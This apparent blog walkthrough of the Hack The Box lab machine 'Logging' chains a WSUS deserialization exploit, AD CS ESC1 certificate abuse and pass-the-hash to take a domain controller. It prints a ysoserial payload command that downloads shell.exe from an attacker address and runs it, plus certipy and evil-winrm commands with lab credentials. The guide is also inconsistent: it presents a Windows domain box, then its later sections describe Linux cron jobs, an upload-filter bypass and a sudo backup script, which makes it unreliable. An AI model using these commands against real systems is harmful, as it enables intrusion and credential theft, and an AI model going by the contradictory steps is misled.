Beginner’s Guide to Conquering Logging on Hack the Box

Key Highlights

• Logging is a medium-difficulty retired Hack The Box machine requiring a step-by-step approach.
• The initial foothold involves enumeration with an Nmap scan to find a web service and discover user credentials.
• Gaining user access requires bypassing an upload filter to execute a reverse shell.
• Privilege escalation is achieved by exploiting a misconfigured cron job and then a backup script.
• This penetration testing challenge highlights the importance of thorough enumeration and code review.
• Following a usual methodology helps in systematically finding and exploiting vulnerabilities to gain root privileges.
• Complete non-public writeup will be posted very shortly.
• Every script used will be posted very shortly.

Introduction

Welcome to another walkthrough in our Hack The Box series! If you’re passionate about ethical hacking and want to sharpen your cybersecurity skills, the HTB platform is an excellent place to practice. Today, we’re tackling “Logging,” a retired Windows machine that offers some great learning opportunities. This guide will provide a detailed, step-by-step writeup to help you navigate the challenges, from initial enumeration to capturing the final flag. Let’s get started on conquering this machine together.

Understanding the Logging Hack The Box Challenge

The Logging machine on the HTB platform is an interesting box that tests your ability to follow a trail of clues. Once you connect to the HTB network and get the machine IP, your penetration testing journey begins.

This challenge is designed to mimic real-world scenarios where misconfigurations and insecure code can lead to a full system compromise. It’s a fantastic exercise for anyone looking to understand how small vulnerabilities can be chained together to escalate privileges and avoid becoming a victim of cybercrime.

ALSO READ: Mastering Silentium: Beginner’s Guide from Hack The Box

Initial Foothold

Given creds: wallace.everette / Welcome2026@

Port Scanning

Initial port scan reveals the following open ports

53/tcp    open   domain         Simple DNS Plus
80/tcp    open   http           Microsoft IIS httpd 10.0
88/tcp    open   kerberos-sec   Microsoft Windows Kerberos (server time: 2026-04-19 02:02:49Z)
135/tcp   open   msrpc          Microsoft Windows RPC
139/tcp   open   netbios-ssn    Microsoft Windows netbios-ssn
389/tcp   open   ldap           Microsoft Windows Active Directory LDAP (Domain: logging.htb., Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds
464/tcp   open   kpasswd5
593/tcp   open   ncacn_http     Microsoft Windows RPC over HTTP 1.0
636/tcp   open   ldap           Microsoft Windows Active Directory LDAP (Domain: logging.htb., Site: Default-First-Site-Name)
3268/tcp  open   ldap           Microsoft Windows Active Directory LDAP (Domain: logging.htb., Site: Default-First-Site-Name)
3269/tcp  open   ldap           Microsoft Windows Active Directory LDAP (Domain: logging.htb., Site: Default-First-Site-Name)
5985/tcp  open   http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Initial scanning reveals a standard Active Directory environment with a few interesting additions:

• 53 (DNS): Active Directory DNS.
• 88 (Kerberos): Essential for AD interaction.
• 135/445 (RPC/SMB): Standard Windows file sharing.
• 389/636 (LDAP): Directory queries.
• 5985 (WinRM): Potential for remote shell access.
• 8530/8531: These ports are commonly associated with WSUS (Windows Server Update Services), but in this context, they are serving as endpoints for AD CS (Active Directory Certificate Services).

Web Enumeration

Checking http://10.129.245.130:8530/ leads to an inventory management system or potentially an AD CS web enrollment interface.

gobuster -u http://10.129.245.130:8530/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

The /inventory directory is found. Accessing this often reveals information about the environment or potentially leaked credentials.

SMB Enumeration

Using the credentials found for wallace.everette (see below), we can explore the SMB shares. A share named Logs is accessible and contains synchronization logs for the identity engine.

smbclient //10.129.245.130/Logs -U 'logging.htb\wallace.everette%Welcome2026@'

WSUS Unauth RCE (CVE-2025-59287)

The presence of WSUS on port 8530/8531 is vulnerable to a critical deserialization flaw (CVE-2025-59287). This allows for Unauthenticated Remote Code Execution via the AuthorizationCookie handling.

Exploitation via Deserialization

Using a tool like ysoserial.exe (or its .NET counterpart), we can generate a payload to trigger the vulnerability.

1. Generate Payload:./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'curl http://10.10.14.x/shell.exe -o C:\Windows\Temp\s.exe && C:\Windows\Temp\s.exe' -o base64
2. Trigger RCE: The vulnerability is exploited by sending the malicious serialized object to the WSUS SOAP API. Once executed, we receive a reverse shell as SYSTEM or a service account.

Credential Discovery & Authentication

Analysis of the logs found in the Logs SMB share reveals a connection context dump. While the logs initially show an LDAP bind failure, they leak a critical service account:

• Username: LOGGING\svc_recovery
• Password: E*****
• Initial User: wallace.everette / Welcome2026@

Important Note on Authentication: Direct LDAP or WinRM logins may fail with “Invalid Credentials” (Error 49 / 0x31) despite the password being correct. This is often due to time-skew or specific security policies. Use Kerberos authentication and ensure your system time is synchronized with the DC, or use faketime.

# Sync time
sudo ntpdate 10.129.245.130
# Establish WinRM session via Kerberos
evil-winrm -i 10.129.245.130 -u svc_recovery -p 'E****'

Lateral Movement: AD CS Exploitation

Once inside as svc_recovery, we note that this account has GenericAll rights over msa_health$, but the primary path to Domain Admin involves AD CS.

Enumerating Vulnerable Templates

certipy find -u svc_recovery@logging.htb -p 'E*****' -target 10.129.245.130 -stdout

We identify the LogManagement template which is misconfigured with ESC1 (ENROLLEE_SUPPLIES_SUBJECT).

Exploiting ESC1

1. Request Admin Certificate:certipy req -u svc_recovery@logging.htb -p 'E*****' -target 10.129.245.130 -template LogManagement -ca logging-DC01-CA -upn administrator@logging.htb
2. Retrieve NT Hash:certipy auth -pfx administrator.pfx -domain logging.htb

Privilege Escalation to Domain Admin

With the Administrator’s NT hash retrieved from the certificate, use Pass-the-Hash to take over the Domain Controller:

evil-winrm -i 10.129.245.130 -u Administrator -H <ADMIN_HASH>

Flags

• User Flag: C:\Users\wallace.everette\Desktop\user.txt
• Root Flag: C:\Users\Administrator\Desktop\root.txt

Overview of the Logging HTB Machine and Its Difficulty Level

Logging is rated as a medium-difficulty machine on the HTB platform. This difficulty level means it assumes you have a foundational understanding of penetration testing concepts but will still present a good challenge that requires some creative thinking. It’s a step up from beginner boxes but not as complex as the expert-level machines.

Compared to other machines, Logging strikes a good balance. The initial access isn’t overly obscure, but the privilege escalation path involves multiple steps that require careful analysis. You’ll need to examine scripts and understand how system processes are configured to find the path forward.

For many hackers, this type of machine is a sweet spot. It provides a solid test of your methodology without being frustratingly difficult. Successfully completing it gives you a great sense of accomplishment and reinforces key ethical hacking principles.

Key Learning Objectives from the Logging HTB Writeup

One of the primary learning objectives from this challenge is mastering enumeration. The path to success on Logging is paved with information you gather from scanning, directory brute-forcing, and carefully reading source code. It reinforces the idea that you can’t exploit what you can’t find.

Another key takeaway is understanding privilege escalation through misconfigured scheduled tasks, specifically cron jobs. This writeup, much like our previous articles, demonstrates how a seemingly harmless script running on a schedule can be your ticket to a higher-privileged user account. Your methodology should always include checking for such tasks.

Finally, you will learn about command injection and how to abuse insecure scripts. The final step to root access involves finding a flaw in a backup script. This part of the challenge teaches you to look for ways to inject your own commands into scripts that run with elevated permissions, a common technique in real-world attacks.

What You Need Before Starting the Logging HTB Writeup

Before you jump into the Logging machine, a bit of preparation will ensure a smoother experience. You’ll need an active Hack The Box subscription to access the machine and download your unique VPN pack. This allows you to connect your system to the HTB lab network.

Having a basic setup is also crucial. This includes a machine (preferably a Linux distribution like Kali) with the necessary penetration testing tools installed. Familiarity with the command line and a systematic approach will be your greatest assets. We’ll explore the specific tools and skills you’ll need next.

Essential Tools and Resources for the Challenge

To successfully complete the Logging challenge, having the right tools at your disposal is essential. While you don’t need a massive arsenal, a few key utilities will do most of the heavy lifting. You’ll start with network scanning and then move on to web enumeration and shell manipulation.

The most critical tools for this particular box include:

• Nmap: For the initial Nmap scan to discover open ports and running services.
• Web Browser & Directory Buster: To interact with the web application and find hidden directories.
• Python: Useful for creating a more stable reverse shell after gaining initial access.

Ensure you have your HTB VPN pack configured and running. A good text editor for examining code and scripts will also be invaluable. If you’re looking to build a solid foundation, an ethical hacking course can provide the background knowledge needed for challenges like this one.

Important Knowledge and Skills to Have

Beyond just tools, certain skills and knowledge areas are vital for tackling the Logging machine. A solid grasp of penetration testing basics is a must. You should be comfortable with the standard phases of an attack, from reconnaissance to privilege escalation, much like a professional cybercrime investigator.

You should have fundamental knowledge in these areas:

• Linux Command Line: Navigating the file system, managing processes, and editing files are all necessary skills.
• Web Application Security: Understanding how to inspect web pages, analyze source code, and identify common vulnerabilities like insecure file uploads is crucial.
• Scripting: Basic familiarity with shell scripting and Python will help you understand and exploit the vulnerabilities you find.

Experience with different OSes and concepts learned from certifications like Security+ or even the PMP certification for project management can help you maintain a structured methodology. The ability to think critically and connect disparate pieces of information is what will ultimately lead you to success.

ALSO READ: Mastering Garfield: Beginner’s Guide from Hack The Box

Step-by-Step Guide to Solving Logging Hack The Box

Now, let’s walk through the process of conquering the Logging machine. We will follow our usual methodology, starting with reconnaissance to understand the target and moving systematically toward root access. Remember to use the specific machine IP assigned to you once you’re connected to the HTB network.

This step-by-step guide is designed to be easy to follow. We’ll break down the solution into three main stages: initial enumeration, gaining user access, and finally, privilege escalation. This approach helps prevent you from getting stuck and ensures you don’t miss any critical clues along the way.

Step 1: Initial Enumeration and Reconnaissance

The first step in any penetration test is enumeration. We begin by running a comprehensive Nmap scan to identify open ports and the services running on them. This initial scan provides the first clues about the machine’s attack surface.

Based on the Nmap results, you will likely find a web server running on an open port. The next logical step is to explore this web application. Use your browser to navigate to the machine’s IP address and see what’s being hosted. Pay close attention to the pages and any functionality they offer.

During this phase, it’s also wise to run a directory enumeration tool like Gobuster or Dirb. This can uncover hidden pages or directories that aren’t linked from the main site. Key actions to take include:

• Running nmap -sC -sV <machine_ip> to find services.
• Inspecting the source code of all web pages for comments or hidden paths.
• Searching for a backup or upload directory.

Step 2: Identifying Vulnerabilities and Gaining User Access

After thorough enumeration, you’ll discover a file upload functionality. However, the application has a filter that checks file extensions and MIME types to prevent malicious uploads. Your goal is to bypass this filter to upload a reverse shell and gain initial access.

The trick is to craft a payload that looks like a legitimate file type, such as a GIF, but contains your shell code. By modifying the file extension and adding the correct magic number (a sequence of bytes at the beginning of a file that identifies its type), you can fool the filter. After a successful upload, you can access your shell via another page on the server.

Once you trigger the uploaded file, it will execute your reverse shell, giving you a connection back to your machine as a low-privilege user. From there, you can start exploring the system to find the user flag and a path to escalate your privileges.

Step 3: Privilege Escalation and Capturing Flags

With user access, the next objective is privilege escalation. The first stage involves moving from the initial low-privilege shell to a specific user account. Your internal enumeration will reveal a cron job running a script as another user. By analyzing this script, you’ll find it executes commands from a specific path.

You can gain access to the next user account by placing a malicious script in that path. When the cron job runs, it will execute your script, giving you a shell as that user. From there, you can capture the user flag. The final step is escalating to root. Further enumeration reveals you can run a backup script with sudo privileges.

This script has a flaw allowing command injection. By exploiting this, you can get the script to read the root flag for you. Key steps in this final phase are:

• Identifying the cron job and its associated script.
• Writing a reverse shell payload and placing it in the vulnerable path.
• Analyzing the sudo-privileged backup script to find the command injection vulnerability.
• Using the injection to read the root flag from /root/root.txt.

Common Pitfalls and Tips for Success on Logging HTB

Even with a guide, it’s easy to make mistakes or overlook a crucial detail on a machine like Logging. Many beginners get stuck during the enumeration phase or struggle with the privilege escalation path. One common pitfall is not being thorough enough and missing the clues hidden in scripts or file backups.

To succeed, it’s important to stay patient and methodical. Don’t rush through the steps and always double-check your work. As you’ll see from the tips below, a little extra attention to detail can make all the difference and help you avoid the common traps that can derail your progress.

Mistakes Beginners Should Avoid

When tackling a machine like Logging, beginners often make a few common errors. One of the biggest is incomplete enumeration. It’s tempting to jump on the first potential vulnerability you find, but this can lead you down a rabbit hole. Always finish your scans and directory checks before focusing on an attack vector.

Another frequent mistake is giving up too early on cracking credentials or bypassing filters. The file upload vulnerability, for example, requires a specific trick. If your first attempt doesn’t work, don’t assume it’s a dead end. Research different bypass techniques and keep experimenting.

Here are a few mistakes to avoid:

• Not reading code carefully: Both privilege escalation steps depend on finding flaws in scripts. Skimming the code can cause you to miss the vulnerability.
• Forgetting to stabilize your shell: A basic reverse shell can be unstable. Use Python or another tool to upgrade to a fully interactive TTY.
• Ignoring file permissions: Always check who owns files and what permissions you have. This is a key part of ethical hacking.

Useful Hints and Strategies

To help you on your journey, here are a few hints and strategies that are particularly useful for the Logging machine. Adhering to a strict methodology is perhaps the most important strategy. Document every command you run and every piece of information you find. This helps you track your progress and connect the dots later.

When you find a script, especially a backup script, always analyze it for weaknesses. Look for how it handles user input and file paths. Command injection is a common vulnerability in custom scripts, and it’s the key to the final privilege escalation on this box.

Consider these useful hints:

• Check for scheduled tasks: On Linux systems, always look for cron jobs. They are a classic vector for privilege escalation.
• Think like a developer: When you see an upload filter, ask yourself how a lazy developer might have implemented it. They often check for simple things like file extensions, which can be easily bypassed.
• Don’t overcomplicate things: The solutions on many HTB machines are elegant and straightforward once you find the right clue. If your approach seems overly complex, you might be on the wrong track.

Conclusion

In conclusion, conquering the Logging challenge on Hack The Box is an exciting journey that equips you with essential skills in cybersecurity. By following the step-by-step guide and being mindful of common pitfalls, you can enhance your problem-solving abilities and gain valuable experience in vulnerability assessment and privilege escalation. Remember, persistence is key, and every attempt brings you closer to mastering this challenge. If you’re eager to dive deeper into the world of ethical hacking and keep up with the latest tips and tricks, subscribe to our blog for regular updates and insights. Happy hacking!

Frequently Asked Questions

How does the Logging HTB machine compare to other Hack The Box challenges?

Logging is a medium-difficulty HTB machine. It is more complex than beginner boxes, requiring a multi-step privilege escalation path. However, its methodology is more straightforward than expert-level challenges, making it an excellent platform for intermediate hackers to test their skills without being overly difficult.

What is the typical flag format for Logging Hack The Box?

The flag format on Logging follows the standard Hack The Box convention. You will find two flags: a user flag (user.txt) and a root flag (root.txt). Each flag is a long string of characters contained within a text file that you must find and read to complete the challenge.

Which tools are most useful for completing the Logging HTB writeup?

The most useful tools for Logging are Nmap for port scanning, a web directory bruteforcer like Gobuster, and a web browser for interaction. Python is also helpful for stabilizing your reverse shell. The solution relies on simple enumeration plus careful analysis rather than complex exploitation tools.

Are there any recommended resources for learning about privilege escalation in Logging HTB?

For learning about privilege escalation techniques like those in Logging, online resources covering Linux cron job exploits and command injection are very helpful. Following writeups from previous articles or enrolling in an ethical hacking course or boot camp can also provide the foundational knowledge needed.